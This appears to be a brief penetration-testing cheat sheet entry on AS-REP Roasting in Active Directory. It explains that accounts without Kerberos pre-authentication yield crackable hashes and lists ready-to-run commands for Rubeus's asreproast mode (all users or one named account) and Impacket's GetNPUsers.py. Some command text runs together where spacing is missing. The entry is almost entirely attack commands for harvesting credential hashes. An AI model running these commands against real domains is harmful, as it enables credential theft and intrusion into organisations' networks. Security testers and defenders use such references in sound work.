If a user does not require Kerberos pre-authentication, an attacker can request an AS-REP for the user and crack the retrieved hash offline.
AS-REP Roasting with Rubeus
# AS-REP Roast all users (burn your opsec):.\Rubeus.exeasreproast/nowrap# AS-REP Roast a specific user:.\Rubeus.exeasreproast/user:$serviceaccount /nowrap
AS-REP Roasting with Impacket
# AS-REP Roast with Impacketpython3GetNPUsers.py $domain -dc-ip $dcip -usersfile $userfile
